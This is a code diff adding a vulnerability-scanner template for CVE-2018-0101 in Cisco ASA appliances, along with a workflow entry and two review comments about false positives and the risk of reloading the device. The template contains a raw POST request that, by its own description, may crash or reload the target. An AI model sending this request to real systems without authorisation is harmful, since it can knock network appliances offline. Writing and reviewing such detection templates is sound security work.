diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml
new file mode 100644
index 0000000000..8448e3c2f6
--- /dev/null
+++ b/cves/2018/CVE-2018-0101.yaml
@@ -0,0 +1,52 @@
+id: CVE-2018-0101
+
+info:
+ name: Cisco ASA Denial-of-Service # Leads to RCE
+ author: dwisiswant0
+ severity: critical
+ reference: https://www.exploit-db.com/exploits/43986
+ description: |
+ A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
+ remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
+ the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
+ tags: cve,cve2018,cisco,dos,rce
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/x-www-form-urlencoded
+ X-Aggregate-Auth: 1
+ X-Transcend-Version: 1
+ Accept-Encoding: identity
+ X-AnyConnect-Platform: linux-64
+ X-Support-HTTP-Auth: false
+ X-Pad: 0000000000000000000000000000000000000000
+
+
+
+ A
+
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200"
+
+ - type: dsl
+ dsl:
+ - "status_code_2 == 500"
+ - "status_code_2 == 501"
+ - "status_code_2 == 502"
+ - "status_code_2 == 503"
+ - "status_code_2 == 504"
+ condition: or
\ No newline at end of file
diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml
index 455eb68e1c..1cfe3751a3 100644
--- a/workflows/cisco-asa-workflow.yaml
+++ b/workflows/cisco-asa-workflow.yaml
@@ -16,4 +16,5 @@ workflows:
 subtemplates:
 - template: cves/2020/CVE-2020-3187.yaml
 - template: cves/2020/CVE-2020-3452.yaml
- - template: cves/2018/CVE-2018-0296.yaml
\ No newline at end of file
+ - template: cves/2018/CVE-2018-0296.yaml
+ - template: cves/2018/CVE-2018-0101.yaml
\ No newline at end of file
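Review bot: The two entries under `matchers:` fire on any host that answers `GET /` with 200 and the follow-up `POST /` with any of 500–504, and neither response is checked for anything that identifies a Cisco ASA. 501 is a common reply from servers that do not accept POST at `/`, and 502–504 are routinely produced by reverse proxies, so a standalone run can report a `critical` finding on unrelated hosts. I would add a third matcher that fingerprints the first response, for example `- "contains(body_1, '<ASA portal marker>')"`, where the marker is a placeholder to be replaced with a string verified against a real portal page. The `info` block should also state that the second request is the malformed input itself, so by the template's own description a match may coincide with a reload of the device. Finally, `name` says Denial-of-Service while the trailing comment and the `rce` tag say RCE; one sentence in `description` saying what the template actually verifies would settle that.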
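Review bot: Adding `cves/2018/CVE-2018-0101.yaml` to `subtemplates` means every run of this workflow now sends the POST that the template's description associates with a device reload to each host that passes the workflow's detection step, which lies outside this hunk. If the `dos` tag is what keeps the template out of default scans, confirm that the same exclusion still applies when it is reached through the workflow; otherwise leave it out here and run it only by explicit selection. A comment above the new entry such as `# active check: may reload the device` would tell operators what the entry does before they run the workflow against production appliances.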